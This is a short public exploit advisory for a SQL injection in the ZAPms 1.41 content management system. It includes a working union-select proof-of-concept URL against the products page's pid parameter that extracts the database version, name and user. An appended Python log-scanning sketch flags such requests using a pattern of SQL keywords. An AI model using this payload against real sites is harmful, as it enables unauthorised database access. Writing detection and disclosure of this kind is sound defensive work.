ZAPms 1.41 – SQL Injection

  • Author: NoGe
    Date: 2013-04-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/24942/
  • =============================================================================================================
    
    
    [o] ZAPms <= SQL Injection Vulnerability
    
     Software : ZAPms
     Version: 1.41
     Vendor : http://www.zapms.de
     Author : NoGe
     Contact: noge[dot]code[at]gmail[dot]com
     Desc : ZAPms is a free open source web content management system,
    adapted to the needs of businesses on the Internet.
    ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.
    
    
    =============================================================================================================
    
    
    [o] Exploit
    
     http://localhost/[path]/products?pid=[SQLi]
    
    
    =============================================================================================================
    
    
    [o] PoC
    
     http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
    
    
    =============================================================================================================
    
    
    [o] Greetz
    
     Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
     aJe kaka11 matthews wishnusakti inc0mp13te martfella
     pizzyroot Genex H312Y noname tukulesto }^-^{
    
    
    =============================================================================================================
    
    
    [o] April 09 2013 - Papua, Indonesia
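
Detection sketch for the request shape shown in the PoC above, added here as an example and not part of the original advisory or of ZAPms: it scans web access logs for requests to the products page whose pid value is not a plain integer. The combined log format, the sample lines and the assumption that legitimate pid values are unsigned integers are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Apr/2013:10:00:01 +0000] "GET /products?pid=14&cid=0&action=details HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Apr/2013:10:00:07 +0000] "GET /products?pid=-14+union+select+1,2,version()--&cid=0&action=details HTTP/1.1" 200 4876',
    '203.0.113.9 - - [09/Apr/2013:10:00:09 +0000] "GET /products?pid=14%20UNION%20SELECT%201 HTTP/1.1" 200 4876',
    '198.51.100.2 - - [09/Apr/2013:10:01:00 +0000] "GET /news?id=3 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens that make a non-integer value look like SQL rather than a typo.
SQL_TOKENS = re.compile(r"\b(union|select|from|sleep|benchmark)\b|--|/\*|'", re.I)

def check_line(line, path_suffix="/products", param="pid"):
    """Return a finding if `param` on the products page is not a plain integer.

    Assumption: legitimate product ids are unsigned integers.
    """
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    # endswith() also covers installs under a sub-path, e.g. /[path]/products
    if not url.path.rstrip("/").endswith(path_suffix):
        return None
    # parse_qs percent-decodes and turns '+' into spaces, as the server would.
    for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
        if not re.fullmatch(r"[0-9]+", value):
            return {"client": client, "value": value,
                    "sql_tokens": bool(SQL_TOKENS.search(value))}
    return None

def scan(lines):
    """Return findings for every log line with a suspicious pid value."""
    return [f for f in map(check_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced on pid in the application before the value reaches the database query, is the input-validation half of the fix; a parameterized query is the other half.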